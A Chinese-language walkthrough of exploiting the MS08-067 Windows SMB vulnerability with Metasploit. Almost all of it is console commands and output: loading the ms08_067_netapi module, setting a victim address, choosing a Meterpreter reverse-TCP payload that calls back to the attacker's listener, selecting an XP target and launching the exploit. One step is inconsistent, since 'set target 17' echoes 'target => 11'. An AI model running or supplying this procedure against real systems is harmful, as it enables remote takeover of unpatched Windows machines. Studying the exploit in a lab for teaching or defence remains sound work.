关于08_067漏洞的利用
- 1.打开终端
2.打开msf控制台
msfconsole有时候会提示有一个什么数据库没有打开,按照弹出的对画框中的命令,先打开要求的那个数据库,就行了
3.查找漏洞利用模板
msf > search 08_067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption4.使用模板
msf > use exploit/windows/smb/ms08_067_netapi之后msf的输入变成了这样
msf exploit(ms08_067_netapi) >5.查看需要配置那些信息
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
6.设置目标电脑IP
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.176 RHOST => 192.168.43.176再次查看配置信息
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.43.176 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
7.查看载荷
msf exploit(ms08_067_netapi) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop windows/adduser normal Windows Execute net user /ADD windows/dllinject/bind_hidden_ipknock_tcp normal Reflective DLL Injection, Hidden Bind Ipknock TCP Stager windows/dllinject/bind_hidden_tcp normal Reflective DLL Injection, Hidden Bind TCP Stager windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86) windows/dllinject/bind_ipv6_tcp_uuid normal Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7) windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager (Windows x86) windows/dllinject/bind_tcp_rc4 normal Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption) windows/dllinject/bind_tcp_uuid normal Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86) windows/dllinject/reverse_hop_http normal Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager windows/dllinject/reverse_http normal Reflective DLL Injection, Windows Reverse HTTP Stager (wininet) windows/dllinject/reverse_ipv6_tcp normal Reflective DLL Injection, Reverse TCP Stager (IPv6) windows/dllinject/reverse_nonx_tcp normal Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) windows/dllinject/reverse_ord_tcp normal Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager windows/dllinject/reverse_tcp_dns normal Reflective DLL Injection, Reverse TCP Stager (DNS) windows/dllinject/reverse_tcp_rc4 normal Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption) windows/dllinject/reverse_tcp_uuid normal Reflective DLL Injection, Reverse TCP Stager with UUID Support windows/dllinject/reverse_winhttp normal Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp) windows/dns_txt_query_exec normal DNS TXT Record Payload Download and Execution windows/exec normal Windows Execute Command windows/format_all_drives manual Windows Drive Formatter windows/loadlibrary normal Windows LoadLibrary Path windows/messagebox normal Windows MessageBox windows/meterpreter/bind_hidden_ipknock_tcp normal Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager windows/meterpreter/bind_hidden_tcp normal Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) windows/meterpreter/bind_ipv6_tcp_uuid normal Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86) windows/meterpreter/bind_tcp_rc4 normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption) windows/meterpreter/bind_tcp_uuid normal Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) windows/meterpreter/reverse_hop_http normal Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet) windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet) windows/meterpreter/reverse_https_proxy normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) windows/meterpreter/reverse_tcp_rc4 normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption) windows/meterpreter/reverse_tcp_uuid normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support windows/meterpreter/reverse_winhttp normal Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp) windows/meterpreter/reverse_winhttps normal Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp) windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline windows/patchupdllinject/bind_hidden_ipknock_tcp normal Windows Inject DLL, Hidden Bind Ipknock TCP Stager windows/patchupdllinject/bind_hidden_tcp normal Windows Inject DLL, Hidden Bind TCP Stager windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86) windows/patchupdllinject/bind_ipv6_tcp_uuid normal Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7) windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager (Windows x86) windows/patchupdllinject/bind_tcp_rc4 normal Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption) windows/patchupdllinject/bind_tcp_uuid normal Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86) windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6) windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS) windows/patchupdllinject/reverse_tcp_rc4 normal Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption) windows/patchupdllinject/reverse_tcp_uuid normal Windows Inject DLL, Reverse TCP Stager with UUID Support windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager windows/patchupmeterpreter/bind_hidden_tcp normal Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86) windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86) windows/patchupmeterpreter/bind_tcp_rc4 normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption) windows/patchupmeterpreter/bind_tcp_uuid normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86) windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) windows/patchupmeterpreter/reverse_tcp_rc4 normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption) windows/patchupmeterpreter/reverse_tcp_uuid normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support windows/shell/bind_hidden_ipknock_tcp normal Windows Command Shell, Hidden Bind Ipknock TCP Stager windows/shell/bind_hidden_tcp normal Windows Command Shell, Hidden Bind TCP Stager windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind IPv6 TCP Stager (Windows x86) windows/shell/bind_ipv6_tcp_uuid normal Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7) windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager (Windows x86) windows/shell/bind_tcp_rc4 normal Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption) windows/shell/bind_tcp_uuid normal Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86) windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6) windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7) windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS) windows/shell/reverse_tcp_rc4 normal Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption) windows/shell/reverse_tcp_uuid normal Windows Command Shell, Reverse TCP Stager with UUID Support windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline windows/shell_hidden_bind_tcp normal Windows Command Shell, Hidden Bind TCP Inline windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!" windows/upexec/bind_hidden_ipknock_tcp normal Windows Upload/Execute, Hidden Bind Ipknock TCP Stager windows/upexec/bind_hidden_tcp normal Windows Upload/Execute, Hidden Bind TCP Stager windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86) windows/upexec/bind_ipv6_tcp_uuid normal Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7) windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager (Windows x86) windows/upexec/bind_tcp_rc4 normal Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption) windows/upexec/bind_tcp_uuid normal Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86) windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6) windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS) windows/upexec/reverse_tcp_rc4 normal Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption) windows/upexec/reverse_tcp_uuid normal Windows Upload/Execute, Reverse TCP Stager with UUID Support windows/vncinject/bind_hidden_ipknock_tcp normal VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager windows/vncinject/bind_hidden_tcp normal VNC Server (Reflective Injection), Hidden Bind TCP Stager windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) windows/vncinject/bind_ipv6_tcp_uuid normal VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (Windows x86) windows/vncinject/bind_tcp_rc4 normal VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption) windows/vncinject/bind_tcp_uuid normal VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) windows/vncinject/reverse_hop_http normal VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet) windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS) windows/vncinject/reverse_tcp_rc4 normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption) windows/vncinject/reverse_tcp_uuid normal VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support windows/vncinject/reverse_winhttp normal VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)8.设置载荷
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp这个载荷要么背下要么记得是什么,能找到也行
9.设置本地IP地址
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.236 LHOST => 192.168.43.236查看配置信息
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.43.176 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.43.236 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
10.查看和设置目标版本ID
msf exploit(ms08_067_netapi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal 4 Windows XP SP2 English (AlwaysOn NX) 5 Windows XP SP2 English (NX) 6 Windows XP SP3 English (AlwaysOn NX) 7 Windows XP SP3 English (NX) 8 Windows XP SP2 Arabic (NX) 9 Windows XP SP2 Chinese - Traditional / Taiwan (NX) 10 Windows XP SP2 Chinese - Simplified (NX) 11 Windows XP SP2 Chinese - Traditional (NX) 12 Windows XP SP2 Czech (NX) 13 Windows XP SP2 Danish (NX) 14 Windows XP SP2 German (NX) 15 Windows XP SP2 Greek (NX) 16 Windows XP SP2 Spanish (NX) 17 Windows XP SP2 Finnish (NX) 18 Windows XP SP2 French (NX) 19 Windows XP SP2 Hebrew (NX) 20 Windows XP SP2 Hungarian (NX) 21 Windows XP SP2 Italian (NX) 22 Windows XP SP2 Japanese (NX) 23 Windows XP SP2 Korean (NX) 24 Windows XP SP2 Dutch (NX) 25 Windows XP SP2 Norwegian (NX) 26 Windows XP SP2 Polish (NX) 27 Windows XP SP2 Portuguese - Brazilian (NX) 28 Windows XP SP2 Portuguese (NX) 29 Windows XP SP2 Russian (NX) 30 Windows XP SP2 Swedish (NX) 31 Windows XP SP2 Turkish (NX) 32 Windows XP SP3 Arabic (NX) 33 Windows XP SP3 Chinese - Traditional / Taiwan (NX) 34 Windows XP SP3 Chinese - Simplified (NX) 35 Windows XP SP3 Chinese - Traditional (NX) 36 Windows XP SP3 Czech (NX) 37 Windows XP SP3 Danish (NX) 38 Windows XP SP3 German (NX) 39 Windows XP SP3 Greek (NX) 40 Windows XP SP3 Spanish (NX) 41 Windows XP SP3 Finnish (NX) 42 Windows XP SP3 French (NX) 43 Windows XP SP3 Hebrew (NX) 44 Windows XP SP3 Hungarian (NX) 45 Windows XP SP3 Italian (NX) 46 Windows XP SP3 Japanese (NX) 47 Windows XP SP3 Korean (NX) 48 Windows XP SP3 Dutch (NX) 49 Windows XP SP3 Norwegian (NX) 50 Windows XP SP3 Polish (NX) 51 Windows XP SP3 Portuguese - Brazilian (NX) 52 Windows XP SP3 Portuguese (NX) 53 Windows XP SP3 Russian (NX) 54 Windows XP SP3 Swedish (NX) 55 Windows XP SP3 Turkish (NX) 56 Windows 2003 SP1 English (NO NX) 57 Windows 2003 SP1 English (NX) 58 Windows 2003 SP1 Japanese (NO NX) 59 Windows 2003 SP1 Spanish (NO NX) 60 Windows 2003 SP1 Spanish (NX) 61 Windows 2003 SP1 French (NO NX) 62 Windows 2003 SP1 French (NX) 63 Windows 2003 SP2 English (NO NX) 64 Windows 2003 SP2 English (NX) 65 Windows 2003 SP2 German (NO NX) 66 Windows 2003 SP2 German (NX) 67 Windows 2003 SP2 Portuguese - Brazilian (NX) 68 Windows 2003 SP2 Spanish (NO NX) 69 Windows 2003 SP2 Spanish (NX) 70 Windows 2003 SP2 Japanese (NO NX) 71 Windows 2003 SP2 French (NO NX) 72 Windows 2003 SP2 French (NX)
设置target ID
msf exploit(ms08_067_netapi) > set target 17
target => 11
11.再一次确认配置信息是否设置完成
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.43.176 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.43.236 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
11 Windows XP SP2 Chinese - Traditional (NX)
12.开始进攻
msf exploit(ms08_067_netapi) > exploit